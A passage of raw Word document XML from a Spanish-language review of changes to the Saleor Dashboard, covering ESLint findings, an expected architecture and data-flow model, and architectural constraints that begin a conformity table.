              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">CouponPracticeButton.tsx:183</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">index.ts:2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">El proyecto prefiere</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
              </w:rPr>
              <w:t xml:space="preserve">named exports</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; el componente usa</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">export default</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">(fuera de alcance de ESLint)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">index.css:0:0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ESLint ignora los</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">.css</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">File ignored</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">); el cambio de branding se evalúa por inspección (ver restricción C4).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Total: 15 problemas — 4 errores, 11 advertencias.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Interpretación.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ESLint demuestra que los cambios del equipo se integraron</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">sin pasar el linter del proyecto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(lint de pre-commit/CI): apenas 3 archivos generan 4 errores y 11 advertencias. El hallazgo de mayor impacto funcional es</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">require-selections</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">—faltan los</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">en la query del botón de cupones—, que además de la advertencia degrada la caché normalizada de Apollo y puede provocar inconsistencias al actualizar datos. Le siguen las funciones sin tipo de retorno explícito (incluida</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">writeAuthState</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, del login con Google) y el uso de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">export default</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">frente a la convención de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">named exports</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">del repositorio. Los 4 errores son de formato (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">padding-line-between-statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) y se corrigen con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--fix</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Nota sobre</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">la configuración de ESLint del proyecto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">no</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">activa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@typescript-eslint/no-explicit-any</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">como error, por lo que los</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">any</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">presentes en</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CouponPracticeButton.tsx:75</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">edge: any</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">:83</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">catch (e: any)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">no</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">aparecen en esta salida; aun así siguen siendo una debilidad de tipado, verificable por inspección directa del código (ver restricción C2).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="X5f77c7d99f63c5a6ae780529a5c50ac70925cbf"/>
      <w:r>
        <w:t xml:space="preserve">1.2 Modelo de arquitectura esperado (definido antes de leer el código)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Basado en el</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">README.md</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">docs/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">configuration.md</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">deployment.md</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">docker.md</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) y la descripción oficial:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">A GraphQL-powered, single-page dashboard application for Saleor.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="componentes-esperados"/>
      <w:r>
        <w:t xml:space="preserve">Componentes esperados</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SPA React (cliente)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: aplicación de página única compilada con Vite; no contiene lógica de negocio de servidor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Capa de datos GraphQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: comunicación exclusiva con el backend Saleor vía Apollo Client contra un único endpoint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/graphql/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; tipos generados por</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">codegen</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pnpm generate:main</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Organización por dominios</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: cada dominio de negocio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discounts/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">customers/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">channels/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">…) agrupa sus vistas y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">components/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Sistema de diseño</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: estilos a través de tokens y componentes de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@saleor/macaw-ui-next</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; no CSS global ad-hoc.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Internacionalización</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: todo texto de UI pasa por</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">react-intl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(formatjs); nada hardcodeado.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Autenticación</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: delegada al backend (token-based / OIDC); el cliente no implementa criptografía propia.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Servido estático</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: en producción se sirve como ficheros estáticos detrás de Nginx (imagen Docker</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nginx:stable-alpine</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="dfd-esperado-alto-nivel"/>
      <w:r>
        <w:t xml:space="preserve">DFD esperado (alto nivel)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        ┌──────────────────────────────────────────────┐</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        │  NAVEGADOR (zona no confiable)                 │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        │   ┌───────────────┐     ┌──────────────────┐   │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  Staff │   │  SPA React     │     │  localStorage     │   │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ───▶  │   │ (Dashboard)    │◀───▶│ refreshToken /    │   │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        │   └──────┬─────────┘     │ authPluginId      │   │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        └──────────┼───────────────┴──────────────────┘   │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                   │ HTTPS  GraphQL (queries/mutations)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        ===========+========== FRONTERA DE CONFIANZA =====</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                   ▼</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        ┌──────────────────────┐        ┌────────────────────┐</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        │ Saleor GraphQL API    │◀──────▶│ Google OIDC (3º)    │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        │ (/graphql/)           │  OAuth │ accounts.google.com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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="Xfff22b0ea629ffcdef8af84977ebfb6f5955ee3"/>
      <w:r>
        <w:t xml:space="preserve">Restricciones arquitectónicas esperadas (a verificar)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">C1 — Sin lógica de servidor en el cliente:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">el Dashboard solo consume GraphQL; no contiene acceso directo a datos ni secretos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">C2 — Tipado estricto:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">any</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; las respuestas GraphQL usan tipos generados por codegen.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">C3 — i18n obligatoria:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">todo texto visible se enruta por</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">react-intl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">C4 — Sistema de diseño macaw-ui:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">estilos vía tokens/componentes, sin overrides de CSS global con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">!important</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">C5 — Organización por dominio + co-ubicación:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">componentes dentro de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">src/&lt;dominio&gt;/components/&lt;Componente&gt;/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, con su test co-ubicado.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">C6 — Endpoint único y configurable:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">todas las llamadas van al</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">API_URL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">configurado; sin URLs hardcodeadas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="tabla-de-conformidad-arquitectónica"/>
      <w:r>
        <w:t xml:space="preserve">1.3 Tabla de conformidad arquitectónica</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000.0"/>
        <w:tblLook w:firstRow="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="440"/>
        <w:gridCol w:w="1906"/>
        <w:gridCol w:w="1173"/>
        <w:gridCol w:w="440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Restricción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:bottom w:val="single"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Estado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:bottom w:val="single"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Evidencia (archivo : línea)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
